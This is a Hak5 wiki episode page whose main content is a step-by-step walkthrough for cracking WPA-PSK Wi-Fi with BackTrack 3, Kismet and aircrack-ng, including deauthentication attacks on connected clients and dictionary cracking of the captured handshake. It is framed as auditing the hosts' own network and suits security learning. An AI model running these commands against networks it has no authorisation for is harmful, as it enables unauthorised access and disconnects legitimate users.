Hak5
Save 10% at GoDaddy.com with coupon code HAK

Episode 3x06

From Hak5

Jump to: navigation, search

Synopsis

In this episode of Hak5 Darren uses the eeePC, BackTrack 3, and Aircrack-ng to audit the security of our WPA encrypted wireless access point. Wess reviews Herbie the Mousebot from Solarbotics, a great electronics projects for beginners/intermediates. Chris Gerling comes by to show us Rockbox, the open source firmware alternative for your portable media players as well as a brief tutorial on building your own songs for frets on fire. Grab a companion cube and gather ’round for some technolust.

Also, Wizzywig volume 1: Phreak now available. Find out about volume 2: Hacking.

Just for reference the structure for WPA hacking is as follows:

Beginning: 1. Download backtrack 3 from here: http://www.remote-exploit.org/backtrack_download.html
2. Burn backtrack three
3. Reboot computer with the CD in and make sure you either access your boot menu and tell the PC to load from CD or make sure the BIOS is set so that CD is the first boot device.
4. Once backtrack is loaded, you are ready to get started.
5. Below, there are instructions for the commands to run for WPA Cracking.


Kubuntu 8.04 (+ Other debian distros probably similar):

  • Personally I use kubuntu, and there is a few weird things with it, i personally would recommend using BT3 but I know a lot of users probably have kubuntu *

1. In kubuntu, if you havent allready enabled extra repositories, open Adept Package manager and make sure you enable all sources
2. Sometimes, kubuntu doesnt recognise you have updated the package manager, goto the Konsole and type:
sudo apt-get update. Let it run for a while while it does the updating.
3. We are going to need madwifi drivers, kismet, aircrack-ng, libpcap and a word list.
4. Everything is in the repos except for madwifi which can be obtained here: http://downloads.sourceforge.net/madwifi/madwifi-0.9.4.tar.gz
5. Just for the record, to setup mad wifi there are instructions below.
6. To install all the other things needed it can be done easily using aptitude
7. Run the commands:
sudo aptitiude install libpcap
sudo aptitiude install kismet
sudo aptitiude install aircrack-ng
sudo aptitiude install airodump-ng
8. Libpcap is needed as without it kismet does not capture packets, its not listed as a dependency though because kismet can run without it, just isnt as functional
9. Once kismet is installed you will need to edit /etc/kismet/kismet.conf
10. Type sudo kate /etc/kismet/kismet.conf
11. There is a line for suiduser= and source= - Change suid user to your username, and as for source it depends, in my situation using the madwifi drivers + an atheros card this works: source=madwifi_ag,ath0,madwifi
12. You should be ready to crack, see the section titled cracking WPA below.
13. I had a few issues in Kubuntu, so its in no way a simple out of the box configuration. One of the main issues I had was that the Wifi device had to be destroyed rather than stopped before monitor mode could be enabled. This can be done by running:

  1. sudo wlanconfig ath0 destroy
  2. sudo wlanconfig ath0 create wlandev wifi0 wlanmode monitor

14. If kismet plays up, get the latest versions source and compile it, I did and it seems to work a heap better
15. Seriously, use BT3 its heaps easier, and you wont be screwing around so much.


MADWIFI Install (from source, not needed in BT3)
1. Download the file (link above)
2. In konsole navigate to the directory you downloaded the file to
3. Run the command: tar -zxvf madwifi-0.9.4.tar.gz
4. CD into the newly created mad wifi directory (cd madwifi-0.9.4)
5. Run ./configure
6. Run make
7. Run make install
8. If theres no errors, good madwifi is installed. If there is errors, note them and google it up.


WPA Cracking:
As explained in the episode by Darren we start by running Kismet.

  1. kismet

1. In kismet, you can press h to get a list of anything you can do within the current section, for example on the first page to sort networks by signal power press s, followed by Q (remember linux is CASE SENSITIVE Q means Q not q).

2. Press enter on any network to find the info about it

3. The info you want is BSSID, Encrypt (needs to be TKIP WPA PSK for this crack) and to see if there is a client on the network press c and it will list any recognised clients and also you need the channel

4. Record the BSSID and a Client MAC address in notepad or somewhere where you can go back to it and dont forget the channel

5. Exit kismet pressing Q on the main page

6. Back at the command line, its time to start your card in monitor mode using this command:

  1. airmon-ng stop ath0 <----- This will stop the device
  2. sudo airmon-ng start wifi0 channelgoeshere <---- This will start the device in monitor mode

7. The next step is to use airodump to dump some files and help us deAuth a client.

8. The command is:

  1. airodump-ng -c (channel) --bssid (of ap) -w psk ath0 <---- the command was explained on the show

9. Any clients detected will be shown at the bottom of the airodump page

10. In a seperate terminal now, we need to deAuth a client, we do this by running the following command:

  1. aireplay-ng -0 15 -a <AP Mac address> -c <CLIENT Mac address> ath0

^ This will send 15 deAuth packets. deAuth pakets, as explained by Darren trick the client into thinking its authentication on the network has expired, and therefore most clients simply reconnect, giving you the handshake in airodump. Remember, proximity to client has a lot to do with a successful deAuth.

11. Now, back in the airodump-ng screen if a client has been disconnected and reconnected it will show in top right hand corner WPA Handshake

12. You are nearly there, now. The final command is:

  1. aircrack-ng -w word.lst -b <AP Mac address> psk*.cap

13. To break that command down, as earlier when running airodump-ng we saved the dump files as psk, we are telling aircrack to read info from any files that are called psk*.cap (* is a wildcard for those who dont know i.e. stands for any character). word.lst is the word list to compare the dump files to, -b is for the BSSID of the AP you are trying to crack.

14. Aircrack will cycle through the wordlist and try to match the data it has to a word in the list, if it does it will state KEY FOUND! and will exit.

15. If you've found the key congratualations, you sucessfully hacked WPA/PSK


Retrieved from "http://wiki.hak5.org/wiki/Episode_3x06"